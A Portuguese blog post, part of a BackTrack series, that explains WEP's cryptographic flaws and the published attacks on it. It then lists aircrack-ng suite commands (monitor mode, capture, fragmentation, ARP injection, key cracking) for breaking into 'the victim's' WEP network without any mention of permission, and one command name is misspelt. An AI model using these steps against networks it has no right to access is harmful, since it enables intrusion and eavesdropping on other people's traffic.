BackTrack Parte III: Quebrando senha Rede Wep



Fala galera! Tendo em vista a grande aceitação sobre nossos posts do BackTrack, vamos agora para a terceira parte. Nesta, vamos começar a brincar de verdade com o SO e vou ensinar como quebrar uma senha de rede WEP de forma simples.

Primeiro vamos entender a rede Wep

O primeiro protocolo de segurança adotado, que conferia no nível do enlace uma certa segurança para as redes sem fio semelhante à segurança das redes com fio, foi o WEP (Wired Equivalent Privacy).
Este protocolo, muito usado ainda hoje, utiliza o algoritmo RC4 para criptografar os pacotes que serão trocados numa rede sem fios a fim de tentar garantir confidencialidade aos dados de cada usuário. Além disso, utiliza-se também a CRC-32 que é uma função detectora de erros que ao fazer a checksum de uma mensagem enviada gera um ICV (Identificador de Circuito Virtual) que deve ser conferido pelo receptor da mensagem, no intuito de verificar se a mensagem recebida foi corrompida e/ou alterada no meio do caminho.

Vulnerável? Sim!

No entanto, após vários estudos e testes realizados com este protocolo, encontraram-se algumas vulnerabilidades e falhas que fizeram com que o WEP perdesse quase toda a sua credibilidade.
Porque RC4 é uma cifra de fluxo, a mesma chave de tráfego nunca deve ser usada duas vezes. O propósito de um VI (vetor de inicialização), que é transmitido em texto puro, é para evitar a repetição, mas um VI de 24 bits não é suficientemente longo para garantir isso em uma rede ocupada. A forma como o VI foi usado também deu brecha para um ataque de chaves-relacionadas ao WEP. Para um VI de 24 bits, há uma probabilidade de 50% de que o mesmo VI irá repetir se após 5000 pacotes.
Em agosto de 2001, Scott Fluhrer, Itsik Mantin, e Adi Shamir publicaram uma criptoanálise do WEP que explora a forma como a cifra RC4 e VI são usados no WEP, resultando em um ataque passivo que pode recuperar a chave RC4 após espionagem na rede. Dependendo da quantidade de tráfego de rede, e desse modo o número de pacotes disponíveis para a inspeção, uma recuperação de chave bem-sucedida poderia levar apenas um minuto. Se um número insuficiente de pacotes está sendo enviado, existem maneiras para um atacante enviar pacotes na rede e, assim, estimular o envio de pacotes de resposta que podem então ser inspecionados para encontrar a chave. O ataque foi logo implementado, e ferramentas automatizadas já foram liberados. É possível realizar o ataque com um computador pessoal, off-the-shelf hardware e software disponíveis gratuitamente como Aircrack-ng para quebrar qualquer chave WEP em minutos. Cam-Winget et al. (2003) pesquisaram uma série de deficiências do WEP. Eles escrevem "Experimentos em campo indicam que, com equipamento adequado, é possível espionar redes protegidas WEP de distâncias de um quilômetro ou mais da meta." Eles também relataram duas fraquezas genéricas: o uso de WEP era opcional, resultando em muitas instalações nunca sequer ativá-los, e a WEP não incluía um protocolo de gerenciamento de chave, contando apenas com uma única chave compartilhada entre os usuários.
Em 2005, um grupo do Federal Bureau of Investigation EUA deu uma demonstração onde rachou uma rede WEP-protegida em três minutos usando ferramentas disponíveis publicamente. Andreas Klein apresentou outra análise da cifra de fluxo RC4. Klein mostrou que há correlação entre a chave de fluxo do RC4 e a chave do que os encontrados por Fluhrer, Mantin e Shamir, que pode ainda ser usado para quebrar WEP e modos de uso semelhantes.
Em 2006, Bittau, Handley, e Lackey mostrou que o protocolo 802.11 em si pode ser usado contra WEP para permitir ataques anteriores que antes eram tidos como impraticáveis. Depois de espionagem de um único pacote, um atacante pode rapidamente transmitir dados arbitrários. O pacote espionado pode então ser descriptografada um byte de cada vez (através da transmissão de cerca de 128 pacotes por byte para descriptografar) para descobrir os endereços IP da rede local. Finalmente, se a rede 802.11 é conectada à Internet, o invasor pode usar a fragmentação 802.11 para repetir os pacotes espionados ao criar um novo cabeçalho IP para eles. O ponto de acesso pode então ser usada para decifrar estes pacotes e retransmiti-las para um amigo na internet, permitindo em tempo real, decodificação de tráfego WEP dentro de um minuto de espionagem do primeiro pacote.
Em 2007, Erik Tews, Andrei Pychkine e Ralf-Philipp Weinmann foram capazes de estender o ataque Klein 2005 e otimizá-lo para uso contra WEP. Com o novo ataque é possível recuperar uma chave de 104 bits WEP com probabilidade de 50% usando apenas 40.000 pacotes capturados. Para 60.000 pacotes de dados disponíveis, a probabilidade de sucesso é de cerca de 80% e para 85 mil pacotes de dados cerca de 95%. Usando técnicas de ativos como deauth e re-injeção ARP, 40.000 pacotes podem ser capturados em menos de um minuto em boas condições. O cálculo real leva cerca de 3 segundos e 3 MB de memória principal em um Pentium-M 1.7 GHz e pode ser adicionalmente otimizada para dispositivos com processadores mais lentos. O mesmo ataque pode ser usado para as chaves de 40 bits com uma probabilidade de sucesso ainda maior.
Em 2008, a última atualização do Data Security Standard (DSS) pelo Payment Card Industry (PCI) Security Standards Council, proíbe o uso do WEP como parte de qualquer processamento de cartão de crédito após 30 de Junho de 2010, e proibir qualquer novo sistema a ser instalado que usa WEP após 31 de março de 2009. O uso de WEP contribuiu para a invasão da rede da empresa T.J. Maxx.

Agora que entendemos suas falhas, vamos ATACA-LA!

Faça download do backtrack depois grave e de boot no dvd. Vai ser pedido senha e login

login: root
senha: toor
depois digite (startx) sem parentese para iniciar o backtrack

Abra o console para digitar os comandos

1: airmon-ng (esse comando faz com que o bt4 reconheça sua placa de rede)
2: airmon-ng start wlan0 (esse comando faz com que fique em modo monitor)
3: airodump-ng mon0 (esse comando faz com que ele procure as redes ao seu redor)


abra outro console

4: airodump-ng --bssid (bssid) --channel x --ivs -w nome rede mon0 (esse comando faz com que vc monitore a rede da vitima)

abra outro console

5: aireplay-ng -5 -b (bssid) mon0 (espere ele vai pedir para você digitar y (yes) depois enter. Com esse comando você pega os pacotes da vitima)

abra outro console

6: aireplay-ng -1 1 -a (bssid) mon0(esse comando captura os pacotes criptografados da vitima)

abra outro console

7: packetforge-ng -0 -a (bssid) -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y (fragments) -w arpy(esse comando captura os date da vitima)

abra outro console

8: airopley-ng -3 -r arpy -b (bssid) mon0

abra outro console

9: aircrack-ng nome rede-01.ivs(aqui é o final e a hora de você saber a senha da rede wep. Eu aconselho a você esperar pelo menos ate 10.000 pacotes para pegar a senha, mas se você quiser com 5.000 pacotes é aceitável).


Então é isso galera, espero que tenha sido útil e até a próxima!

Abraços de seu amigo Bruno Rafael.

Veja também:

BackTrack Parte I
BackTrack Parte II


Gostou? Curta nossa página:
https://www.facebook.com/Javanamente?bookmark_t=page

Parceiros:
Rota Urbana:https://www.facebook.com/RotaUrbana
Execute TI: http://www.executeti.com.br/
TaLegal: http://mastalegal.com.br/

Comentários

Postagens mais visitadas deste blog

E Esse Tal de Nano Service?

Executar Audio em Java Swing

Validando Email em Java Com e Sem expressão Regular